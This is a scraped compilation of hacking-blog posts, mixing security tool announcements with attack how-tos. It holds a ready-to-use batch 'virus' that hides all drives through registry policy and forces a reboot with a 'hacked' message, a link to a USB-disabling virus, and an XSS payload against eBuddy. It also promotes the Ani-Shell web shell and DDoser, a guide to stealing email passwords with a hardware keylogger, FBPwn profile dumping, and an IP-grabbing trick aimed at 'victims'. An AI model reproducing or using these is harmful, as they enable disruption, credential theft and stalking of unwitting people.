JonDo 00.16.001 Released - Automatic error recognition and easier usability

JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymization program, that you can use for anonymous surfing in the Internet with high security anonymous proxy servers.

What is JonDo?
JonDo is an open source and free-of-charge program for Windows, Linux and MacOS X. It hides the user's IP adress behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.

What is new?
Statistics and support requests about the usage of JonDo let assume that several users of older versions do not use the software correctly, and may thereby surf the net unsecured. The current version warns the user in such a case and launches an assistant for fixing the problem if necessary. Of course, users may also consult the extensive online help for this purpose, or use the forum or the support by e-mail or ask other user in the support chat. In any case, it is recommended to visit the IP Check in order to test the own configuration for weaknesses.

Moreover, several minor bugs and stability problems have been resolved, and the program's usability has been enhanced further. By changing to new server protocols within the next four weeks, older versions of JonDo will soon be unusable. Also for this reason, users of earlier versions should update instantaneously, if possible.

Download: JonDo IP changer

Department of Homeland Security Releases Cyber Security Evaluation Tool (CSET)

The Cyber Security Evaluation Tool (CSET) is a Department of Homeland Security (DHS) product that assists organizations in protecting their key national cyber assets. It was developed under the direction of the DHS National Cyber Security Division (NCSD) by cybersecurity experts and with assistance from the National Institute of Standards and Technology. This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. It includes both high-level and detailed questions related to all industrial control and IT systems. The tool is available for download, and the program also offers training and support at no cost to organizations engaged in administering networks that control facilities identified as being crucial to both the nation's economy and national security.

CSET is a desktop software tool that guides users through a step-by-step process to assess their control system and information technology network security practices against recognized industry standards. The output from CSET is a prioritized list of recommendations for improving the cybersecurity posture of the organization's enterprise and industrial control cyber systems. The tool derives the recommendations from a database of cybersecurity standards, guidelines, and practices. Each recommendation is linked to a set of actions that can be applied to enhance cybersecurity controls.

CSET has been designed for easy installation and use on a stand-alone laptop or workstation. It incorporates a variety of available standards from organizations such as National Institute of Standards and Technology (NIST), North American Electric Reliability Corporation (NERC), International Organization for Standardization (ISO), U.S. Department of Defense (DoD), and others. When the tool user selects one or more of the standards, CSET will open a set of questions to be answered. The answers to these questions will be compared against a selected security assurance level, and a detailed report will be generated to show areas for potential improvement. CSET provides an excellent means to perform a self-assessment of the security posture of your control system environment.

Key Benefits

• CSET contributes to an organization's risk management and decision-making process
• Raises awareness and facilitates discussion on cybersecurity within the organization
• Highlights vulnerabilities in the organization's systems and provides recommendations on ways to address the vulnerability
• Identifies areas of strength and best practices being followed in the organization
• Provides a method to systematically compare and monitor improvement in the cyber systems
• Provides a common industry-wide tool for assessing cyber systems

Download CSET

[Source]

Findmyhash - Find Cracked Hashes Online

findmyhash is a Python script which has been developed to find different types of password hashes using multiple cracking online services. In case that it does not find a favourable “cracked” hash, it will also present you with relevant Google search results.

This is open source script can mostly serve as a start up point for cracking any hash. It supports a lot many online hash cracking services.
Cracking services supported by findmyhash:

• Schwett.com
• Netmd5crack.com
• MD5-Cracker.tk
• tools.BenRamsey.com
• md5.Gromweb.com
• md5.HashCracking.com
• victorov.su
• md5.thekaine.de
• tmto.org
• md5-db.de
• md5.my-addr.com
• md5pass.info
• md5decryption.com
• md5crack.com
• md5online.net
• md5-decrypter.com
• authsecu.com
• hashcrack.com
• objectif-securite.ch
• c0llision.net
• md5.rednoize.com
• cmd5.org
• cacin.net
• ibeast.com
• password-decrypt.com
• bigtrapeze.com
• hashchecker.com
• md5hashcracker.appspot.com
• passcracking.com
• askcheck.com
• cracker.fox21.at
• crackfoo.nicenamecrew.com
• joomlaaa.com
• md5-lookup.com
• sha1-lookup.com
• sha-256.sha1-lookup.com
• ripemd-lookup.com
• md5.com.cn
• md5.digitalsun.pl
• md5.drasen.net
• md5.myinfosec.net
• md5.net
• md5.noisette.ch
• md5hood.com
• stringfunction.com
• xanadrel.99k.org
• isc.sans.edu
• bokehman.com

Chances are, if this script does not find your hash, it might be unique and you will have to crack it! As of now, it supports the following nine hashing algorithms:

• MD4
• MD5
• SHA1
• SHA256
• RMD160
• MYSQL
• CISCO7
• LM
• NTLM

This script has been duly tested with MD5, LM and NTLM hashes because they are the most common ones.
Download findmyhash

iScanner - Tool to detect and remove malicious codes and web page

iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files.

Current Features:

• Ability to scan one file, directory or remote web page / website.
• Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.
• Extensive log shows the infected files and the malicious code.
• Support for sending email reports.
• Ability to clean the infected web pages automatically.
• Easy backup and restore system for the infected files.
• Simple and editable signature based database.
• You can easily send malicious file to iScanner developers for analyzes.
• Ability to update the database and the program easily from iScanner's server.
• Very flexible options and easy to use.
• Fast scanner with great performance.
• Yes, it's FREE!!

Download iScanner

Ani-Shell v1.4 Released With Python - Bind Shell , Anti-Crawler Feature and MD5 Cracker

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , a DDoser , A MD5 hash Cracker , Python and PHP Bind-Shells , Anti-Crawler Features etc! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization!
New Features :-

• MD5 Hash Cracker
• Python Bind-Shell
• Anti-Crawler Function
• Shell Support for some Older Servers
• Better CSS
• Whole New Logo

Ani-Shell Project Page : http://sourceforge.net/projects/ani-shell/
Ani-Shell Homepage : http://ani-shell.sourceforge.net/

Pscan 2.0 - multi threaded TCP Syn port scanner

TCP Port scanner Multi threaded with possibility to scan 65535. TCP ports on an IP address.You can specify how many threads to run and the timeout. Further more it will tell you the MAC address of the target and the service runningFor LINUX and Windows. 
 

 

 

 Change Log

- Added option -s for Syn scan.
- Scanning made faster thanks to Syn scan
- Added even more default ports
- Improved error handler for Syn scan
- Improved text output
- Fixed minor bugs:
- changed pathname to oui.txt and port-numbers.txt files
- added missing call to cleanup function WSACleanup

Download multi threaded TCP Syn port scanner 2.0

How to crack or Reset BIOS Password?

Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways:

1. Clear CMOS
This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected. 

Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is gone. 

If the above looks complicated, is easy to clear cmos by unplugging the BIOS battery and then put it back. But with the consequences of removing the label is the warranty on the battery BIOS.

2. Through DOS 

First out of the windows with me restart your computer, start the computer in MS-DOS mode, use the option "Command Prompt Only" 

At c: prompt, type: DEBUG 
press enter. You will see the sign (-) at the DEBUG prompt, then type: 
o 70 2e 
at the DEBUG prompt will be displayed as-o 70 2e. 
press enter and type: 
-O 71 ff 
press enter, the last type: 
Q 
hit enter, then you will get out of the DEBUG prompt and return to the C:> prompt. 
Now restart your COMPUTER, and see the results

Nmap 5.61TEST1 Released

This Nmap 5.61TEST1 is an informal test release with all of the latest features from the SVN. Nmap (“Network Mapper”) is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are avalable for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), and a utility for comparing scan results (Ndiff).
 

click here to Download

How to Hack passwords using Hardware Keylogger

 


Did you know that keyloggers are the simplest way to hack password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an passwords using hardware keylogger. 

A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.

Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.

So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.

Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.

Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

BIOS based Virus discovered by Chinese Security Firm

A Chinese AV company 360 discovered a new Trojan, the “BMW Virus” (also called Mebromi), that can actually infect a computers BIOS: “BMW 360 Security Center virus is the latest catch of a high-risk virus, the virus that infected a chain BIOS (motherboard chip program), MBR (master boot drive) and Windows system files, reinstall the system, regardless of the victim computer, format the hard disk, or replace the hard disk can not completely remove the virus.”

It uses the CBROM command-line tool to hook its extension into the BIOS. The next time the system boots, the BIOS extension adds additional code to the hard drive's master boot record (MBR) in order to infect the winlogon.exe / winnt.exe processes on Windows XP and 2003 / Windows 2000 before Windows boots. The next time Windows launches, the malicious code downloads a rootkit to prevent the drive's MBR from being cleaned by a virus scanner. But even if the drive is cleaned, the whole infection routine is repeated the next time the BIOS module is booted. Mebromi can also survive a change of hard drive. If the computer doesn't use an Award BIOS, the contaminant simply infects the MBR.

If the system uses a BIOS other than Award, the Trojan skips trying to write to the BIOS, but still tries to infect the MBR of the boot hard drive.Removing the virus from the MBR and infected files really has no effect, because as soon as the system is restarted, the BIOS is read and the computer re-infected again.Seeming most virus companies will not want to create a BIOS cleaning utility, most likely the BIOS would need to be re-flashed to remove the virus infection completely.
[Source]

McAfee DeepSAFE - Anti-rootkit Security Solution

McAfee previewed its DeepSAFE hardware-assisted security technology for proactively detecting and preventing stealthy advanced persistent threats (APTs) and malware. The technology, which was co-developed with Intel, sits below the OS, providing the ability to fundamentally change the security game, according to the companies. 

According to McAfee Labs, more than 1,200 new rootkits per day are detected - equating to 50 per hour every single day. The DeepSAFE technology, which was demonstrated at the Intel Developer Forum in San Francisco, was able to detect and stop a zero-day Agony rootkit from infecting a system in real time. This technology is expected to launch in products later in 2011.

Key attributes of McAfee DeepSAFE:

• Builds the foundation for next-generation hardware-assisted security operating beyond the operating system
• Provides a trusted view of system events below the operating system
• Exposes many attacks that are undetectable today
• New vantage point to block sophisticated stealth techniques and APTs
• Provides real time CPU event monitoring with minimal performance impact
• Combines the power of hardware and flexibility of software to deliver a new foundation for security.

"Intel and McAfee are working on joint technologies to better protect every segment across the compute continuum from PCs to devices," said Renée James, senior vice president and general manager of the Software and Services Group at Intel and the Chairman of McAfee. "By combining the features of existing Intel hardware and innovations in security software, Intel and McAfee are driving innovation in the security industry by providing a new way to protect computing devices. We are truly excited to introduce this technology upon which we will deliver new solutions."
[Source]

FBPwn : A Cross-Platform Facebook Profile Dumper tool

FBPwn is an open source, cross-platform, Java based Facebook profile dumper. It can send friend requests to a list of Facebook profiles, and poll for their acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder. It supports a lot of modules that can expand its current functionalities. It has a well documented Wiki page explaining the process of building a FBPwn module. Though it has a lot of available modules prebuilt for your use.

All modules work on a selected profile URL (we’ll call him Bob), using a valid authenticated account (we’ll call him Mallory).

AddVictimFriends: Request to add some or all friends of Bob to increase the chance of Bob accepting any future requests, after he finds that you have common friends.

ProfileCloner: A list of all Bob’s friends is displayed, you choose one of them (we’ll call him Andy). FBPwn will change Mallory’s display picture, and basic info to match Andy’s. This will generate more chance that Bob accepts requests from Mallory as he thinks he is accepting from Andy. Eventually Bob will realize this is not Andy’s account, but probably it would be too late as all his info are already saved for offline checking by Mallory.

CheckFriendRequest: Check if mallory is already friend of Bob, then just end execution. If not, the module tries to add bob as as a friend and poll waiting for him to accept. The module will not stop executing until the friend request is accepted.

DumpFriends: Accessable friends of Bob is saved for offline viewing. The output of the module depends on other modues, if mallory is not a friend of Bob yet, the data might not be accessable and nothing will be dumped.

DumpImages: Accessable images (tagged and albums) are saved for offline viewing. Same limitations of dump friends applies.

DumpInfo: Accessable basic info are saved for offline viewing. Same limitations of dump friends applies.

So you can see, you can do almost everything that you could do manually with Facebook. People might use it for malicious purposes too like cloning a Facebook profile. In addition to reading the Facebook official security guide, you need to avoid friend requests from un-known people.

Download FBpwn

Registry Decoder - Digital Forensics Tool

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Digital forensics deals with the analysis of artifacts on all types of digital devices. One of the most prevalent analysis techniques performed is that of the registry hives contained in Microsoft Windows operating systems. Registry Decoder was developed with the purpose of providing a single tool for the acquisition, analysis, and reporting of registry contents.

 

Download Here

how to change window 7 logon screen ? (win tricks)

Are you got bored seeing same logon screen ? you wanna change it?

Here is a trick to change logon screen for my friends :)

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\

LogonUI\Background

If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

DDOs Tracer - 1.0 Released

 

At most any time of the day, there's a distributed denial-of-service (DDOS) attack underway somewhere on the Internet. Yes, it's still true, despite reports that some ISPs have experienced fewer DDOS attacks overall during the last six months. It's a matter of quality, not quantity: "When DDOSes do occur, they are done with much greater purpose than they used to be," says Rodney Joffe, senior vice president and senior technologist for Neustar, a directory services and clearinghouse provider for Internet industry. "They are usually to obscure what's [really] happening in the background."

So if you want to be safe and trace someone like a pro here is the tool that is being used by tracing the ms per second and then if the site goes down or just get lot of traffic it will report the time that the attacker started his web attack, that is really good as you can report the attack and give to police more information or just use the information for your host or home connection.

VIDEO DEMO:

DOWNLOAD :http://www.4shared.com/file/0Q2SpWG4/DDos_Tracer.html

How to take ownership of a file in windows

If you are a Windows Vista user then you will know all about file ownership and permissions related issues and now it is extended to windows 7 too.

Windows 7 has implemented an additional security mechanism to prevent accidental or intentional file or folder modification by not allowing users other than the owner of the file or folder to access it. Henceforth if you need to access, modify or delete such files or folders you need to take ownership first then assign rights or permission to respective users.

Taking ownership of system files or folders in Windows 7 or Vista is not a simple task. Whether you use the GUI or the command line, it takes far too many steps. Rizone Ownership will add a “Take Ownership” option under the Explorer right-click menu that will handle all the steps for you. This menu option is used to modify the Discretionary Access Control lists (DACLs). Simply put, it unlocks or gets ownership of a file or folder.

  Download from : http://www.rizonesoft.com/downloads/ownership.zip

How To Find Someones IP Address

1. Go to www.whatstheirip.com. The site will ask for your email. Enter your email and click “get links”.

2. You will be emailed a couple of links. The links when clicked will lead to a “page not found” and “invalid thread specified”. When one of the links is clicked it will email you back the IP of whoever clicked the link.

3. If it’s a victim that I have interaction with on a board or forum I always ask them “Is this you they are referring to in this thread”….the person invariably clicks the link and I’m emailed back their IP

Now  that you have your victim’s IP you are ready and you can remotely shut down their computer or port scan them or do whatever your dirty mind can think of.

Batch Virus code to disable All Hard disk (part 13)

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by hckr333.blogspot.com !\" -f

copy the program in  notepad and save it as .bat

goto part -12 of .bat virus programming (click here)

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

Step 1:
Download the file : http://www.mediafire.com/?7nmaxc5cs758827


 Step 2:
You need to compile them before you can run it

Step 3:
Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

Stpe 4. 
To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

Persistent XSS vulnerability in eBuddy Web Messenger

A team member from Virtual Luminous Security, Russian Federation, has discovered a persistent XSS vulnerability in eBuddy (the biggest web IM solution in the world) by transmitting messages with embedded encoded javascript code.
In-depth detail
eBuddy Web Messenger suffers from an encoded-Persistent XSS vulnerability in the messaging function. (while sendingA message with embedded code to another authorized user in eBuddy WebMessenger).

Exploit example
Plain XSS (Not going to store, nor execute)
<script>alert('eBuddy Persistent XSS');</script>
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.

[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.

How Antivirus Software Works

Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer. Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well if you are one among those few who would really bother to understand how an antivirus works, then this article is for you.

 

How Antivirus Works

 

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

 

1. Signature-based detection (Dictionary approach)

 

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk. 

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

 

2. Heuristic-based detection (Suspicious behavior approach)

 

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus softwares to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviors like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

Most commercial antivirus softwares use a combination of both signature-based and heuristic-based approaches to combat malware.

 

Issues of concern

 

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released everyday, it is most essential to update the antivirus software so as to keep the virus definitions up-to-date. Most softwares will have an auto-update feature so that the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user education is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.